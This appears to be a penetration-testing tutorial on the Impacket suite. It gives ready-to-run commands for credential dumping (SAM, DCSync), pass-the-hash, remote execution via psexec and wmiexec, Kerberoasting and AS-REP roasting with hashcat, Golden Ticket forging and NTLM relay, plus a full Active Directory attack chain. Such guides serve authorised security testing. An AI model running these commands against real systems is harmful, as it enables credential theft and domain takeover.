Impacket is a collection of Python classes for working with network protocols. Created by SecureAuth and now maintained as an open-source project at github.com/fortra/impacket, it provides implementations of SMB, MSRPC, NTLM, Kerberos, LDAP, and dozens of other Windows protocols at the raw packet level. For penetration testers targeting Windows environments and Active Directory, Impacket’s included scripts are indispensable — they can dump credentials, execute commands, perform Pass-the-Hash attacks, Kerberoast, and much more.
This guide covers the most important Impacket scripts with real usage examples.
Installing Impacket
Impacket is preinstalled on Kali Linux. To install or update manually:
pip3 install impacket
Or install the latest development version:
git clone https://github.com/fortra/impacket.git
cd impacket
pip3 install .
Scripts are typically located at /usr/share/doc/python3-impacket/examples/ on Kali, or wherever pip installs them (usually in your PATH after pip install).
secretsdump.py — Dumping Credentials
secretsdump.py is one of the most powerful tools in the Impacket suite. It can dump:
- SAM database (local account hashes)
- NTDS.dit (domain controller hashes)
- LSA secrets
- DPAPI masterkeys
- Cached credentials
Remote SAM Dump (Over SMB)
secretsdump.py domain/username:password@192.168.1.100
Domain Controller Dump (DCSync)
DCSync replicates the NTDS.dit remotely without touching the filesystem:
secretsdump.py -just-dc domain/username:password@dc01.domain.local
Pass-the-Hash with secretsdump
If you have an NTLM hash instead of a cleartext password:
secretsdump.py -hashes :aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88885d6df0b16 \
domain/administrator@192.168.1.100
The format is -hashes LMhash:NThash. Use an empty LM hash (32 as) if LM isn’t available.
psexec.py — Remote Command Execution
psexec.py provides a PsExec-like shell over SMB, executing commands via a service binary uploaded to the target:
psexec.py domain/administrator:password@192.168.1.100
With Pass-the-Hash:
psexec.py -hashes :32ed87bdb5fdc5e9cba88885d6df0b16 administrator@192.168.1.100
This drops you into a SYSTEM-level shell if the credentials are valid.
wmiexec.py — Stealthier Command Execution
wmiexec.py executes commands through WMI instead of creating a service, leaving fewer artifacts:
wmiexec.py domain/administrator:password@192.168.1.100
Execute a single command without an interactive shell:
wmiexec.py domain/administrator:password@192.168.1.100 "whoami"
smbexec.py — SMB-Based Execution
smbexec.py is another execution method, useful when psexec is blocked:
smbexec.py domain/administrator:password@192.168.1.100
atexec.py — Task Scheduler Execution
Execute commands via the Windows Task Scheduler:
atexec.py domain/administrator:password@192.168.1.100 "whoami"
GetSPNs.py — Kerberoasting
Kerberoasting extracts Kerberos TGS tickets for service accounts and cracks them offline. Any domain user can request TGS tickets for any SPN:
GetSPNs.py -dc-ip 192.168.1.10 domain.local/username:password -request
Output hashes in Hashcat format:
GetSPNs.py -dc-ip 192.168.1.10 domain.local/username:password \
-request -outputfile kerberoast_hashes.txt
Then crack with Hashcat:
hashcat -m 13100 kerberoast_hashes.txt rockyou.txt -r best64.rule
GetNPUsers.py — AS-REP Roasting
AS-REP Roasting targets accounts with “Do not require Kerberos pre-authentication” enabled. The KDC returns an AS-REP that can be cracked offline:
GetNPUsers.py domain.local/ -usersfile users.txt -no-pass -dc-ip 192.168.1.10
With valid credentials to auto-discover vulnerable accounts:
GetNPUsers.py domain.local/username:password -request -dc-ip 192.168.1.10
Crack with Hashcat:
hashcat -m 18200 asrep_hashes.txt rockyou.txt
GetUserSPNs.py vs GetSPNs.py
These are effectively the same script under different names depending on the version. Both perform Kerberoasting — use whichever is on your system.
smbclient.py — SMB File Operations
Interact with SMB shares for file enumeration and transfer:
smbclient.py domain/username:password@192.168.1.100
This gives you an interactive shell to list shares, download files, and upload tools:
# smb: \> shares
# smb: \> use C$
# smb: \C$\> ls
# smb: \C$\> get Windows\System32\config\SAM
lookupsid.py — SID Brute-Forcing
Enumerate domain users and groups by brute-forcing SIDs:
lookupsid.py domain/username:password@192.168.1.10
This is useful for user enumeration when other methods are blocked.
samrdump.py — SAMR Enumeration
Enumerate domain users via SAMR without authentication (if the server allows it):
samrdump.py 192.168.1.10
With credentials:
samrdump.py domain/username:password@192.168.1.10
ticketer.py — Golden and Silver Ticket Attacks
Create Kerberos Golden Tickets (requires the KRBTGT hash):
ticketer.py -nthash <krbtgt_ntlm_hash> -domain-sid S-1-5-21-... \
-domain domain.local Administrator
Load the ticket into the current session:
export KRB5CCNAME=Administrator.ccache
secretsdump.py -k -no-pass dc01.domain.local
ntlmrelayx.py — NTLM Relay Attacks
ntlmrelayx.py captures and relays NTLM authentication to other hosts, enabling credential capture without cracking:
ntlmrelayx.py -tf targets.txt -smb2support
Combine with Responder to capture NTLM hashes from the network:
# Terminal 1 - Responder (disable SMB and HTTP)
responder -I eth0 -P -d -b
# Terminal 2 - Relay to targets
ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"
Common Impacket Workflow in AD Pentesting
A typical Active Directory engagement with Impacket follows this progression:
- Enumerate users with
samrdump.py or lookupsid.py
- AS-REP Roast non-pre-auth accounts with
GetNPUsers.py
- Kerberoast service accounts with
GetSPNs.py
- Crack hashes offline with Hashcat
- Move laterally with
wmiexec.py or psexec.py
- Dump credentials with
secretsdump.py
- DCSync the entire domain once you have DA credentials
Summary
Impacket is the backbone of Windows and Active Directory penetration testing. Its Python-based protocol implementations work reliably across diverse environments without requiring a Windows machine. Mastering secretsdump, the Kerberos attack scripts, and the remote execution tools gives you a comprehensive toolkit for every phase of an internal network assessment.